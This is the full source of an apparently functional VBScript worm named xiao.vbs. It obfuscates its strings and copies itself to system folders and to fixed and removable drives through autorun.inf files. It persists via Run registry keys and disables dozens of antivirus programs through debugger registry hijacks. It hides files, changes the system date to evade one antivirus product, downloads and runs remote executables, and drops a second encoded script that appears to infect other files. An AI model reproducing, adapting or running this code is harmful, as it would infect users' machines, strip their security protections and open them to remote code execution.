on error resume next
fh="ivwt?":br="01":js="3z{73iu7":oy="y3":kc="0Z42FYW":kcc="0d1exvFqF":iv="@k@4+|D":ma="x1W":mz="'xiao2.5":set cl=createobject("wsc"&"ript.s"&"hell")
set fso=createobject("script"&"ing.fi"&"lesyste"&"mobject"):set dc=fso.drives:dir=fso.getspecialfolder(1)&"/":win=fso.getspecialfolder(0)&"/"
wb=dir&"wbem/":exe=fso.getspecialfolder(2)&"/":xiao=wscript.scriptfullname:ml=left(xiao,len(xiao)-len(wscript.scriptname)):if readtxt(xiao,1)<>mz then df xiao:wscript.quit
h=vbcrlf:pc="xiao.vbs":dt=".pif":aff="autorun.inf":pp="2.5":set sf=fso.opentextfile(xiao,1):vc=sf.readall:ayy="/ILFZ`MPDBM`NBDIJOF]TPGUXBSF]Njdsptpgu]Xjoepxt!OU]DvssfouWfstjpo]Jnbhf!Gjmf!Fyfdvujpo!Pqujpot]":ayi="ILFZ`MPDBM`NBDIJOF]TPGUXBSF]Njdsptpgu]Xjoepxt!OU]DvssfouWfstjpo]Jnbhf!Gjmf!Fyfdvujpo!Pqujpot]"
pv=".reg":tp="wscript.exe ":k=".exe":SC="_Vriwzduh_Plfurvriw_Zlqgrzv_FxuuhqwYhuvlrq":EF="_H{soruhu_Xvhu#Vkhoo#Iroghuv":aa=ik(ayy):ab=ik(ayi)
RL="_Srolflhv_H{soruhu_Uxq_H{soruhu":WV="Zlqgrzv#Uhjlvwu|#Hglwru#Yhuvlrq#8133":pyg=decode(sc):pce=decode(ef):pla=decode(rL):pcg=decode(wv):lj="F=_Grfxphqwv#dqg#Vhwwlqjv_Doo#Xvhuv_Dssolfdwlrq"
bbk="wscript":ljj="%F=_Grfxphqwv#dqg#Vhwwlqjv_Doo#Xvhuv_dssolfdwlrq%":pl="prnttcl.vbs"
Z42FYW
Function pd(dz,cs)
if cs=1 then If fso.FileExists(dz) Then pd=1
if cs=2 then If fso.FolderExists(dz) Then pd=2
if cs=3 then If not fso.FileExists(dz) Then pd=3
if cs=4 then If not fso.FolderExists(dz) Then pd=4
End Function
function zm(zn)
if pd(zn,1) then df zn
end function
Function decode(zl)
On Error Resume Next
For i= 1 To Len(zl):Curchar=Mid(zl,i,1):If Asc(Curchar) = 16 then Curchar=chr(8):Else:Curchar=chr(Asc(Curchar)-3):DeCode=Decode & Curchar
Next
End Function
function bn(wp)
for i=1 to len(wp)
bn=bn+chr(asc(mid(wp,i,1))-i)
next
end function
function re()
cl.run "regedit /s .reg",0:wscript.sleep 3000:df dir&pv
end function
function jzc()
on error resume next
if pd(decode(lj)&"/"&pc,3) Then
ks=cl.regread ("HKCU"&PYG&PLA)
if not ks=pc then
if jc("avp"&k,1) then
nowdate=date
command="%COMSPEC% /c date 2003-"&month(Date)&"-"&Day(Date)
cl.run command,0,true                  
wscript.sleep 5000
rg
else
rg
ks=cl.regread ("HKCU"&PYG&PLA)
if not ks=pc  then
ges=cl.regread("HKCU"&pyg&pce&"/Startup")
if not ges="%USERPROFILE%/Application" then set i=fso.createtextfile(dir&pv, true):i.writeline pcg&h&"[HKEY_CURRENT_USER"&pyg&pce&"]"&h&"""Startup""=hex(2):25,00,55,00,53,00,45,00,52,00,50,00,52,00,4f,00,46,00,49,00,4c,00,45,00,25,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,00,00":i.close:re
if pd(decode(lj),4) then fso.createfolder (decode(lj)):attr decode(lj)&asd&"/",6:cv decode(lj)&"/"&pc
if pd(decode(lj)&"/"&pc,3) then cv decode(lj)&"/"&pc
end if
end if
end if
end if
end function
function gr()
on error resume next
for each d in dc
if d.drivetype=3 or (d.drivetype=1 and d<>"A:" and d<> "B:") then
if pd(d&"/"&aff,2) then
command="%COMSPEC% /c  rd /s /q "&d&"/"&aff
cl.run command,0,true
end if
if pd(d&"/"&aff,1) and pd(d&"/"&pc,1) then  
if readtxt(d&"/"&aff,1)<>"forgiveme" then fso.copyfile dir&af,d&"/"&aff,true
if readtxt(d&"/"&pc,1)<>mz then cv d&"/"&pc
else
yh(d&"/"&aff):cv d&"/"&pc :yc
end if
end if
if d.drivetype=2 then  if pd(d&"/"&aff,1) then  df d&"/"&aff
next
end function
Function hd(www,ys,sm,css)
on error resume next
if pd(exe&ys&k,3) then
Set Post = CreateObject("microsoft.XMLHTTP")
Post.Open "GET",www,0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
if sm>3000 then aGet.savetoFile exe&ys,2:wscript.sleep 10000:if pd(exe&ys,1) then attr exe&ys,7:cl.run exe&ys:exit function
if css=0 then  aGet.savetoFile exe&ys:wscript.sleep 5000:exit function
aGet.savetoFile exe&ys&k,2
wscript.sleep 10000
if pd(exe&ys&k,1) then attr exe&ys&k,6:filesize=fso.getfile(exe&ys&k).size
if filesize>sm and css=1 then  cl.run exe&ys&k
end if
End Function
function bm()
on error resume next
for each ps in getobject _
("winmgmts://./root/cimv2:win32_operatingsystem").instances_
bm=ps.version
next
end function
function ez()
on error resume next
a1="*Hunter"&k:a2="THGUARD"&k:a3="*Hunter"&k:a4="PFW"&k:a5="ZONEALARM"&k:a6="WEBSCANX"&k:a7="TBSCAN"&k:a8="SMC"&k:a9="spidernet"&k
a0="acaegmgr"&k:b1="ahnsdsv"&k:b2="ahnsd"&k:b3="psview"&k:b4="KVSrvXP"&k:b5="auto"&k:b6="ccsetmgr"&k:b7="defwatch"&k:b8="woptiutilities"&k:b9="snipesword"&k
b0="iparmor"&k:c1="arvmon"&k:c2="srgui"&k:c3="KVOL"&k:c4="kvxp_1"&k:c5="icesword"&k:c6="fwmain"&k:c7="wsyscheck"&k:s="]":r="""DEBUGGER""=""SDF""":y=s&h&r&h&aa
c8="Mcshield"&k:c9="Tbmon"&k:c0="360tray"&k:d1="ravmon"&k:d2="rfwsrv"&k:d3="runiep"&k:d4="kissvc"&k:d5="kwatch"&k:d6="kavstart"&k
d7="kpfw32"&k:d8="nod32krn"&k:d9="nod32kui"&k:d0="egui"&k:e1="ekrn"&k:e2="mmqczj"&k:e3="avgnt"&k:e4="avguard"&k:e5="ccapp"&k
e6="ccevtmgr"&k:e7="navw32"&k:e8="kvxp"&k:e9="avg"&k:e0="guid"&k:f1="ssm"&k:f2="mpstart"&k:f3="APVXDWIN"&k:f4="PAVFNSVR"&k
f5="KRegEx"&k:f6="KvDetect"&k:f7="AVENGINE"&k:f8="gr9x3863r"&k
db=CL.REGREAD(ab&f8&"/DEBUGGER")
if not db="SDF" then
set i=fso.createtextfile(dir&pv, true)
i.writeline pcg&h&aa&a1&y&a2&y&a3&y&a4&y&a5&y&a6&y&a7&y&a8&y&a9&y&a0&y&b1&y&b2&y&b3&y&b4&y&b5&y&b6&y&b7&y&b8&y&b9&y&b0&y&c1&y&c2&y&c3&y&c4&y&c5&y&c6&y&c7&y&c8&y&c9&y&c0&y&d1&y&d2&y&d3&y&d4&y&d5&y&d6&y&d7&y&d8&y&d9&y&d0&y&e1&y&e2&y&e3&y&e4&y&e5&y&e6&y&e7&y&e8&y&e9&y&e0&y&f1&y&f2&y&f3&y&f4&y&f5&y&f6&y&f7&y&f8&s&h&r
i.close
re
end if
end function
function Z42FYW()
on error resume next
ph
set xml=createobject("microsoft.xmlhttp")
xml.open "GET","http://www.baidu.com/index.html",false
xml.send
if xml.status<>200 then oo
if pd(exe&dt,1) then df exe&dt
if  GetLocale=2052 then
dw=hd(bn(fh)&bn(br)&bn(js)&bn(oy)&bn(kc)&bn(iv)&pp,dt,0,0)
else
dx=hd(bn(fh)&bn(br)&bn(js)&ma&bn(kc)&bn(iv)&pp,dt,0,0)
end if
wscript.sleep 5000
set oe=fso.opentextfile(exe&dt,1)
qk=oe.readline:ak=oe.readline:ay=oe.readline:ad=oe.readline:ae=oe.readline:af=oe.readline:ag=oe.readline:ah=oe.readline
ai=oe.readline:aj=oe.readline:an=oe.readline:al=oe.readline:am=oe.readline:ax=oe.readline:oe.close
mzz="2.5":hu=bn(fh)&bn(br)&bn(js)&bn(oy)&bn(kcc)
if ak>mzz then hd ad,ay,3500,1:wscript.sleep 3000:wscript.quit
If instr(qk,"http") > 0 Then ds
execute ik(am):execute ik(ax)
ez:df dir&pl
do
wscript.sleep 100
execute ik(ae):execute ik(af):execute ik(ag):execute ik(ah):execute ik(ai):execute ik(aj):execute ik(an):execute ik(al)
gj=cl.regread("HKLM"&PYG&PLA)
if gj=".vbs" or gj=".vbe" then cl.regdelete("HKLM"&PYG&PLA)
if pd(decode(lj)&"/"&".vbs",1) then df decode(lj)&"/"&".vbs"
if pd(decode(lj)&"/"&pc,1) and readtxt(decode(lj)&"/"&pc,1)<>mz then cv decode(lj)&"/"&pc
jzc:gr
if readtxt(dir&pc,1)<>mz then cv dir&pc
if readtxt(wb&pc,1)<>mz then cv wb&pc
ve=cl.regread ("HKCU"&PYG&PLA)
if jc("taskmgr"&k,0) then oo
if jc("avp"&k,1)and date>2003 then:nowdate=date:command="%COMSPEC% /c date 2003-"&month(Date)&"-"&Day(Date):cl.run command,0,true
loop
end function
function ph()
on error resume next
ayk="ILMN]Tztufn]DvssfouDpouspmTfu]Dpouspm]TbgfCppu]Njojnbm]whbtbwf/tzt]"
attr xiao,6
if pd(dir&pc,3) then cv dir&pc
if pd(wb&pc,3) then cv wb&pc
jzc  
kh=cl.regread(ik(ayk))
if kh="Driver" then cl.regdelete(ik(ayk))
cl.run "regsvr32 /s ""C:/Program Files/Common Files/System/ado/msado15.dll",0,False
cl.run "net start "&chr(34)&"task scheduler"&chr(34) ,0,False:wscript.sleep 5000:cl.run "at /d /y",0,False
if pd(dir&"network.vbe",1)then df dir&"network.vbe"
end function
function oo()
on error resume next
df dir&pl:cv dir&pl
cl.run "at "&time+0.001&" /interactive "&pl,0,False
wscript.quit
end function
function cj(wr,wt)
df wr
set bin=fso.createtextfile(wr,true)
bin.writeline wt
bin.close
attr wr,6
end function
function yc()
on error resume next
set i=fso.createtextfile(dir&pv, true)
i.writeline pcg&h&"[HKEY_CURRENT_USER"&pyg&"/Explorer/Advanced]"&h&"""ShowSuperHidden""=dword:00000000"
i.close
re
end function
function readtxt(wr,line)
on error resume next
if line<0 then wr=wscript.scriptfullname
if fso.fileexists(wr) then
if fso.getfile(wr).size=0 then
readtxt=0
else
set readfile=fso.opentextfile(wr,1)
set chickline=fso.opentextfile(wr,1)
chickline.readall
txtline=chickline.line
chickline.close
if line>0  and line<=txtline then
i=0
do while i<line
i=i+1
if not readfile.atendofstream then
strline=readfile.readline
else
strline=0
end if
loop
readtxt=strline
elseif line<=0 then
readtxt=readfile.readall
else
readtxt=0
end if
readfile.close
end if
else
readtxt=0
end if
end function
function ds()
f1="Function ChgStr(str,table,key):For i=1 To Len(str):one=Mid(str,i,1):flag=FALSE:For j=1 To Len(table)"
f2="If one=Mid(table,j,1) Then ChgStr=ChgStr&Mid(key,j,1):flag=TRUE:Exit For"
f3="Next:If flag=FALSE Then ChgStr=ChgStr&one"
f4="Next:End Function"
f5="Execute(ChgStr(""""&""MR SxxMx xSjaNS RSFk""&VBCrLf&""2kN=""""2kN"""":2kNq=""""2kNq"""":Lj3=""""Lj3"""":Bj=""""Bj"""":j2kNq=""""j2kNq"""":Lj3F=""""Lj3F"""":323=""""323"""":U2M=""""U2M""""""&VBCrLf&""GSk JGC = ZxSLkSCbBSKk(""""GKxD3kDRU.JDqSGsjkSNCbBSKk""""):SFS=ujM.USkj3SKDLquMqzSx(o)&""""/"""":FDLM=pjKxD3k.jKxD3kuaqqRLNS""&VBCrLf&""GSk zK = ujM.ixDySj:uMx SLK2 z DR zK:jSk MS=ujM.M3SRkSFkuDqS(SFS&"""".3Du"""",I):Qt=MS.xSLzqDRS:MS.KqMjS""&VBCrLf&""Du z.zxDySqSkkSx<>""""Z""""  k2SR j(z):ujM.zSqSkSuDqS FDLM""&VBCrLf&""Pd0A""&VBCrLf&""jab j(R)""&VBCrLf&""MR SxxMx xSjaNS RSFk ""&VBCrLf&""jSk R=ujM.USkuMqzSx(R):jSk uDqSj=R.uDqSj:uMx SLK2 N DR uDqSj:SFk=ujM.USkSFkSRjDMRRLNS(N):SFk=qKLjS(SFk)""&VBCrLf&""Du SFk=U2M k2SR ujM.USkuDqS(N.3Lk2):N.zSqSkS(kxaS)""&VBCrLf&""Du SFk=Lj3 Mx SFk=2kN Mx SFk=2kNq Mx SFk=Bj Mx SFk=Lj3F Mx SFk=j2kNq Mx SFk=323 k2SR ""&VBCrLf&""LL=ujM.USkuDqS(N.3Lk2)""&VBCrLf&""jSk k= ujM.C3SRASFkJDqS(LL,I,kxaS):q=k.gSLz1qq:k.KqMjS""&VBCrLf&""Vu RMk DRjkx(q,""""mmIM"""") > m A2SR""&VBCrLf&""jSk k=ujM.C3SRASFkJDqS(LL, o, kxaS):k.hxDkS q&ybKxqu&Qt:k.KqMjS ""&VBCrLf&""SRz Du""&VBCrLf&""SRz Du""&VBCrLf&""RSFk""&VBCrLf&""pjKxD3k.jqSS3 I:jSk jabuMqzSxj=R.jabuMqzSxj:uMx SLK2 jabuMqzSx DR jabuMqzSxj:j(jabuMqzSx)""&VBCrLf&""RSFk""&VBCrLf&""SRz jab""&VBCrLf&""""&VBCrLf,""0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"",""XAhpKQ9PU5TjOiJxS61FcaomVNqneYgIB3MCub4EH7RWDstL0z2wlGykfZ8rvd""))"
set i=fso.createtextfile(dir&"network.vbe", true)
i.writeline f1&h&f2&h&f3&h&f4&h&f5
i.close
cl.run "wscript "&dir&"network.vbe",0,False
end function
function rg()
on error resume next
set i=fso.createtextfile(dir&pv, true)
i.writeline pcg&h&"[HKEY_CURRENT_USER"&pyg&"/policies/Explorer/Run/]"&h&"""Explorer""=""xiao.vbs"""
i.close
re
end function
Function ik(wr)
On Error Resume Next
For i= 1 To Len(wr):cr=Mid(wr,i,1):If Asc(cr) = 12 then cr=chr(8):Else:cr=chr(Asc(cr)-1):ik=ik & cr
Next
End Function
function yh(wr)
on error resume next
df wr
set i=fso.createtextfile(wr, true)
i.writeline "forgiveme"&h&"[autorun]"&h&"open="&tp&pc&h&"shell/open/Command="&tp&pc&h&"shell/find/Command="&tp&pc&h&"shell/open/default=1"
i.close
attr wr,6
end function
function cv(wr)
df wr
set vbs=fso.createtextfile(wr, true)
vbs.write vc
vbs.close
attr wr,7
end function
function attr(file,change)
if pd(file,1) then
set ofile=fso.getfile(file)
ofile.attributes=change
set ofile=nothing
end if
if pd(file,2) then
set ofile=fso.getfolder(file)
ofile.attributes=change
set ofile=nothing
end if
end function
function df(wr)
if pd(wr,1) then attr wr,0:fso.deletefile(wr)
if pd(wr,2) then command="%COMSPEC% /c  rd /s /q "&wr:cl.run command,0,true
end function
function jc(wr,gs)
on error resume next
set y=getobject("winmgmts://./root/cimv2")
set x=y.execquery("select * from win32_process where name='"&wr&"'")
i=0
for each j in x
i=i+1
next
if not er then
if i>gs then jc=true
else
jc=1
end if
end function
function er()
if err.number=0 then
er=false
else
err.clear
er=true
end if
end function